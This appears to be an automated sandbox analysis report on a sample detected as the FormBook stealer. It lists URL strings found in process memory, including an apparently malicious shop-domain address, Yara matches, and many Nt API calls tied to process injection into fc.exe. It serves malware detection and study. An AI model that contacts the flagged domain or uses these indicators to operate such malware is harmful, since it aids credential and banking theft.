                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: fc.exe, 00000007.00000002.4135576349.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.00000000035DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ultrawin23.shop/53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.SDBARVe3d3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SDBARVe3d3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0042C633 NtClose,2_2_0042C633
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762B60 NtClose,LdrInitializeThunk,2_2_01762B60
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01762DF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01762C70
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017635C0 NtCreateMutant,LdrInitializeThunk,2_2_017635C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01764340 NtSetContextThread,2_2_01764340
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01764650 NtSuspendThread,2_2_01764650
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762BF0 NtAllocateVirtualMemory,2_2_01762BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762BE0 NtQueryValueKey,2_2_01762BE0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762BA0 NtEnumerateValueKey,2_2_01762BA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762B80 NtQueryInformationFile,2_2_01762B80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762AF0 NtWriteFile,2_2_01762AF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762AD0 NtReadFile,2_2_01762AD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762AB0 NtWaitForSingleObject,2_2_01762AB0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762D30 NtUnmapViewOfSection,2_2_01762D30
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762D10 NtMapViewOfSection,2_2_01762D10
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762D00 NtSetInformationFile,2_2_01762D00
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762DD0 NtDelayExecution,2_2_01762DD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762DB0 NtEnumerateKey,2_2_01762DB0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762C60 NtCreateKey,2_2_01762C60
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762C00 NtQueryInformationProcess,2_2_01762C00
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762CF0 NtOpenProcess,2_2_01762CF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762CC0 NtQueryVirtualMemory,2_2_01762CC0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762CA0 NtQueryInformationToken,2_2_01762CA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762F60 NtCreateProcessEx,2_2_01762F60
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762F30 NtCreateSection,2_2_01762F30
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762FE0 NtCreateFile,2_2_01762FE0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762FB0 NtResumeThread,2_2_01762FB0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762FA0 NtQuerySection,2_2_01762FA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762F90 NtProtectVirtualMemory,2_2_01762F90
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762E30 NtWriteVirtualMemory,2_2_01762E30
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762EE0 NtQueueApcThread,2_2_01762EE0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762EA0 NtAdjustPrivilegesToken,2_2_01762EA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762E80 NtReadVirtualMemory,2_2_01762E80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01763010 NtOpenDirectoryObject,2_2_01763010
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01763090 NtSetValueKey,2_2_01763090
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017639B0 NtGetContextThread,2_2_017639B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01763D70 NtOpenThread,2_2_01763D70
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01763D10 NtOpenProcessToken,2_2_01763D10
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C4340 NtSetContextThread,LdrInitializeThunk,7_2_031C4340
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C4650 NtSuspendThread,LdrInitializeThunk,7_2_031C4650
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C35C0 NtCreateMutant,LdrInitializeThunk,7_2_031C35C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2B60 NtClose,LdrInitializeThunk,7_2_031C2B60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_031C2BA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_031C2BF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_031C2BE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2AD0 NtReadFile,LdrInitializeThunk,7_2_031C2AD0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2AF0 NtWriteFile,LdrInitializeThunk,7_2_031C2AF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C39B0 NtGetContextThread,LdrInitializeThunk,7_2_031C39B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2F30 NtCreateSection,LdrInitializeThunk,7_2_031C2F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2FB0 NtResumeThread,LdrInitializeThunk,7_2_031C2FB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2FE0 NtCreateFile,LdrInitializeThunk,7_2_031C2FE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_031C2E80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_031C2EE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_031C2D10
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_031C2D30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2DD0 NtDelayExecution,LdrInitializeThunk,7_2_031C2DD0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_031C2DF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_031C2C70
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2C60 NtCreateKey,LdrInitializeThunk,7_2_031C2C60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_031C2CA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C3010 NtOpenDirectoryObject,7_2_031C3010
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C3090 NtSetValueKey,7_2_031C3090
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2B80 NtQueryInformationFile,7_2_031C2B80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2AB0 NtWaitForSingleObject,7_2_031C2AB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2F60 NtCreateProcessEx,7_2_031C2F60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2F90 NtProtectVirtualMemory,7_2_031C2F90
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2FA0 NtQuerySection,7_2_031C2FA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2E30 NtWriteVirtualMemory,7_2_031C2E30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2EA0 NtAdjustPrivilegesToken,7_2_031C2EA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C3D10 NtOpenProcessToken,7_2_031C3D10
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2D00 NtSetInformationFile,7_2_031C2D00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C3D70 NtOpenThread,7_2_031C3D70
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2DB0 NtEnumerateKey,7_2_031C2DB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2C00 NtQueryInformationProcess,7_2_031C2C00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2CC0 NtQueryVirtualMemory,7_2_031C2CC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C2CF0 NtOpenProcess,7_2_031C2CF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A29260 NtDeleteFile,7_2_02A29260
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A29300 NtClose,7_2_02A29300
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A29000 NtCreateFile,7_2_02A29000
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A29170 NtReadFile,7_2_02A29170
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A29460 NtAllocateVirtualMemory,7_2_02A29460
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_0516D6C40_2_0516D6C4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_072978F00_2_072978F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_072997480_2_07299748
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_072937E00_2_072937E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_072937DB0_2_072937DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_072933A80_2_072933A8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_07293C080_2_07293C08
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_07293C180_2_07293C18
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_07291CB00_2_07291CB0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_072918600_2_07291860
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_072918780_2_07291878
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_004186132_2_00418613
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_004168432_2_00416843
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0041683F2_2_0041683F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_004100F32_2_004100F3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_004028A02_2_004028A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_004030B02_2_004030B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0040E1732_2_0040E173
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0040E43E2_2_0040E43E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0042ECA32_2_0042ECA3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0040FED32_2_0040FED3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_004046D42_2_004046D4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B81582_2_017B8158
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CA1182_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017201002_2_01720100
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E81CC2_2_017E81CC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F01AA2_2_017F01AA
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E41A22_2_017E41A2
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C20002_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EA3522_2_017EA352
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E3F02_2_0173E3F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F03E62_2_017F03E6
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D02742_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B02C02_2_017B02C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017305352_2_01730535
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F05912_2_017F0591
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E24462_2_017E2446
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D44202_2_017D4420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DE4F62_2_017DE4F6
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017307702_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017547502_2_01754750
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172C7C02_2_0172C7C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174C6E02_2_0174C6E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017469622_2_01746962
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A02_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017FA9A62_2_017FA9A6
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173A8402_2_0173A840
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017328402_2_01732840
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E8F02_2_0175E8F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017168B82_2_017168B8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EAB402_2_017EAB40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E6BD72_2_017E6BD7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA802_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CCD1F2_2_017CCD1F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173AD002_2_0173AD00
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172ADE02_2_0172ADE0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01748DBF2_2_01748DBF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730C002_2_01730C00
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720CF22_2_01720CF2
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0CB52_2_017D0CB5
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A4F402_2_017A4F40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01750F302_2_01750F30
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D2F302_2_017D2F30
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01772F282_2_01772F28
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01722FC82_2_01722FC8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AEFA02_2_017AEFA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730E592_2_01730E59
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EEE262_2_017EEE26
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EEEDB2_2_017EEEDB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742E902_2_01742E90
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017ECE932_2_017ECE93
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171F1722_2_0171F172
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017FB16B2_2_017FB16B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176516C2_2_0176516C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173B1B02_2_0173B1B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E70E92_2_017E70E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EF0E02_2_017EF0E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DF0CC2_2_017DF0CC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017370C02_2_017370C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171D34C2_2_0171D34C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E132D2_2_017E132D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0177739A2_2_0177739A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174D2F02_2_0174D2F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D12ED2_2_017D12ED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174B2C02_2_0174B2C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017352A02_2_017352A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E75712_2_017E7571
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CD5B02_2_017CD5B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017214602_2_01721460
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EF43F2_2_017EF43F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EF7B02_2_017EF7B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017756302_2_01775630
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E16CC2_2_017E16CC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017399502_2_01739950
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174B9502_2_0174B950
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C59102_2_017C5910
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179D8002_2_0179D800
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017338E02_2_017338E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFB762_2_017EFB76
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A5BF02_2_017A5BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176DBF92_2_0176DBF9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174FB802_2_0174FB80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A3A6C2_2_017A3A6C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFA492_2_017EFA49
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E7A462_2_017E7A46
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DDAC62_2_017DDAC6
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CDAAC2_2_017CDAAC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01775AA02_2_01775AA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D1AA32_2_017D1AA3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E7D732_2_017E7D73
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E1D5A2_2_017E1D5A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01733D402_2_01733D40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174FDC02_2_0174FDC0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A9C322_2_017A9C32
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFCF22_2_017EFCF2
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFF092_2_017EFF09
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFFB12_2_017EFFB1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01731F922_2_01731F92
